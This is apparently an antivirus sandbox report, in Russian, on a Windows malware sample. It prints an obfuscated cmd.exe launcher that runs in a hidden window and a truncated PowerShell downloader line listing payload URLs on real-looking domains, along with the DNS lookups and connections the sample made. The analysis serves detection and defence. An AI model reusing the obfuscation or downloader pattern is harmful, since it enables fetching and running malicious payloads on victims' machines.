Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c C^m^D; ; \v^ ;;; \r " ; (^s^Et ^ ^MF^S=l^h Q^Y Nu^ se^ ZS^ ra ^b^I mp 37^ ^36 w^h Kg^ VU^ xI V^x yn^ h^H^ v^s}Hf^}2^m{^7GhNtckhtKw^aRvc^Xx}J^d}^8^LkQDa^61e6^ars^ bD^1;ZQ^MSC^d7U^i^PH$^J...
Сетевая активность
Подключается к
- 'do#i.nl':80
- 'sm#v.ru':80
UDP
- DNS ASK be###echicc.com
- DNS ASK bo#.co.id
- DNS ASK do#i.nl
- DNS ASK st###m-dom45.ru
- DNS ASK sm#v.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c C^m^D; ; \v^ ;;; \r " ; (^s^Et ^ ^MF^S=l^h Q^Y Nu^ se^ ZS^ ra ^b^I mp 37^ ^36 w^h Kg^ VU^ xI V^x yn^ h^H^ v^s}Hf^}2^m{^7GhNtckhtKw^aRvc^Xx}J^d}^8^LkQDa^61e6^ars^ bD^1;ZQ^MSC^d7U^i^PH$^J...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; /v ;;; /r " ; (^s^Et ^ ^MF^S=l^h Q^Y Nu^ se^ ZS^ ra ^b^I mp 37^ ^36 w^h Kg^ VU^ xI V^x yn^ h^H^ v^s}Hf^}2^m{^7GhNtckhtKw^aRvc^Xx}J^d}^8^LkQDa^61e6^ars^ bD^1;ZQ^MSC^d7U^i^PH$^JU^ y^LszY...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $iiM='QzA';$mGP='http://www.be###echicc.com/RZmFsaGIKM@http://bo2.co.id/X8rCrhlVQ@http://dobi.nl/CUVCh0I@http://www.stroim-dom45.ru/NcQuHX9Q@http://smmv.ru/kiAJn9wD'.Split('@');$idM=([System.IO...
